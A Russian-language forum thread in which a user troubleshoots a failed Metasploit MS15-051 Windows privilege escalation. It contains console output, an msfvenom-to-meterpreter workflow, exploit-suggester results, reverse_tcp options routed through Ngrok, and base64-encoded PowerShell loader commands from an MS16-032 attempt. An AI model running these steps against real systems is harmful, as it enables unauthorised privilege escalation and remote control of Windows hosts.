• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Не получается повысить привилегии ms15_051

msfonio

Member
16.11.2020
12
0
BIT
0
msf6 exploit(windows/local/ms15_051_client_copy_image) > exploit

[*] Started reverse TCP handler on 0.0.0.0:1232
[*] win32k.sys file version: 6.0.6003.20705 branch: 20
[*] Launching notepad to host the exploit...
[+] Process 27144 launched.
[*] Reflectively injecting the exploit DLL into 27144...
[*] Injecting exploit into 27144...
[*] Exploit injected. Injecting payload into 27144...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.

Почему сессию не открывает ? Что не так делаю !!!
set ForceExploit true
 

Pernat1y

Red Team
05.04.2018
1 443
135
BIT
0
1. У тебя сессия от какого пользователя уже есть?
2. Покажи show options
3. Попробуй с set VERBOSE true
 

msfonio

Member
16.11.2020
12
0
BIT
0
1. У тебя сессия от какого пользователя уже есть?
2. Покажи show options
3. Попробуй с set VERBOSE true

Pernat1y спасибо за быстрый отклик .​

как я делаю пентест и получаю сессию.
1) делаю msfvenom полезную нагрузку в exe.
2) Получаю сессию юзера
3) meterpreter> run post/multi/recon/local_exploit_suggester
Получаю:
[+] 127.0.0.1 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 127.0.0.1 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 127.0.0.1 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 127.0.0.1 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 127.0.0.1 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 127.0.0.1 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.

Нужно повысить привилегии, гугл говорит это возможно с exploit/windows/local/ms15_051_client_copy_image

show options:
msf6 exploit(windows/local/ms15_051_client_copy_image) > options

Module options (exploit/windows/local/ms15_051_client_copy_image):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 127.0.0.1 yes The listen address (an interface may be specified)
LPORT 1232 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows x86

advanced:
msf6 exploit(windows/local/ms15_051_client_copy_image) > advanced

Module advanced options (exploit/windows/local/ms15_051_client_copy_image):

Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
VERBOSE true no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 0 no Additional delay when waiting for a session


Payload advanced options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess true yes Automatically load the unhook extension and unhook the process
AutoVerifySession true yes Automatically verify and drop invalid sessions
AutoVerifySessionTimeout 65 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadBindPort no Port to bind reverse tcp socket to on target system.
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependMigrate true yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded true yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE true no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
 

msfonio

Member
16.11.2020
12
0
BIT
0
LHOST 127.0.0.1 да и вообще все "127.0.0.1" - это так и надо?
только с настроеным Ngrok прилетают сессии от полезной нагрузки .exe

не понимаю почему уязвимость
msf6 exploit(windows/local/ms15_051_client_copy_image) > exploit
не открывает сессию;
[*] Exploit completed, but no session was created.
 

msfonio

Member
16.11.2020
12
0
BIT
0
Голова уже болит , не понимаю почему экплоит работает и не открывает сессию [palmface] Что делаю не так , а что то явно делаю не так. Помогите знающие, в какую сторону смотреть
Почему [*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:13483
[+] Compressed size: 1016
[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBIADQAcwBJAEEARgBMAG0ATAAyAEEAQwBBADgAdABNADAAMQBEAFIAaQBBADYAdQBMAEMANQBKAHoAZABWAHoAegBTAHYATABMAE0AcgBQAHkAMAAzAE4ASwA0AG0AMQBzAGcAbwBvAHkAawA5AE8ATABTADcATwBMADMATABPAEwAOAAwAHIAMABWAFQAUQBUAFMAOQBSAE0ATgBSAFUAcQBGAFoASQBUAGMANwBJADEAMQBBAHEASwBTAHAATgBWAGQASgBVAHEAQQBVAEEAOQBQAE0ASgBpAEUASQBBAEEAQQBBAD0AJwApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBDAEwAUgBkAGYAaABHAHMAJwA7AA==
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBIADQAcwBJAEEARgBMAG0ATAAyAEEAQwBBADgAdABNADAAMQBEAFIAaQBBADYAdQBMAEMANQBKAHoAZABWAHoAegBTAHYATABMAE0AcgBQAHkAMAAzAE4ASwA0AG0AMQBzAGcAbwBvAHkAawA5AE8ATABTADcATwBMADMATABPAEwAOAAwAHIAMABWAFQAUQBUAFMAOQBSAE0ATgBSAFUAcQBGAFoASQBUAGMANwBJADEAMQBBAHEASwBTAHAATgBWAGQASgBVAHEAQQBVAEEAOQBQAE0ASgBpAEUASQBBAEEAQQBBAD0AJwApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBDAEwAUgBkAGYAaABHAHMAJwA7AA== -InputFormat None
[+] Cleaning up 52368
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBIADQAcwBJAEEARgByAG0ATAAyAEEAQwBBADQAdAAyAHoAUwB2AEwATABNAHIAUAB5ADAAMwBOAEsANABtADEAcwBuAEoAUABMAFUARQBTAEMARQBzAHMAeQBrAHgATQB5AGsAawB0ADEAbABBAFAATABVADQAdABVAHQAZgBVAHkAMAA2AHQATABLADQASgBUAHMAMQBKAFQAUwA3AFIARABTADQAcAB5AHMAeABMAFYAMABnAE8AeQBrAGcAdQA5AGcAOABzAHIAVgBHAHQAagBrAFkAMQBMAEIAaQByAFkAUgBvAHEAOABUAG8AcQBlAGEAVQA1AE8AVABwAFEAUQAyAHMAQgBMAEoASABhADEASQBRAEEAQQBBAEEAPQAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApAGUAYwBoAG8AIAAnAEMATABSAGQAZgBoAEcAcwAnADsA -InputFormat None
[*] PS1 loaded from /usr/share/metasploit-framework/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[!] C:\Windows\SYSWOW64\windowspowershell\v1.0\powershell.exe
[*] Writing payload file, C:\Users\sige\AppData\Local\Temp\ecCZSOxxIi.ps1...
[*] Compressing script contents...
[+] Compressed size: 3592
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|

[by b33f -> @FuzzySec]

[?] Operating system core count: 24
[>] Duplicating CreateProcessWithLogonW handle
[!] No valid thread handle was captured, exiting!

[+] Executed on target machine.
[+] Deleted C:\Users\sige\AppData\Local\Temp\ecCZSOxxIi.ps1
[*] Exploit completed, but no session was created.
 

mcfly

Green Team
08.09.2016
615
619
BIT
246
Голова уже болит , не понимаю почему экплоит работает и не открывает сессию [palmface] Что делаю не так , а что то явно делаю не так. Помогите знающие, в какую сторону смотреть
Почему [*] Exploit completed, but no session was created.
В Zoom сможешь выйти? Ссылку отправлю. Покажу на своем пк как правильно сделать разшарю свой рабочий стол. Просто расписывать долго.
 
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!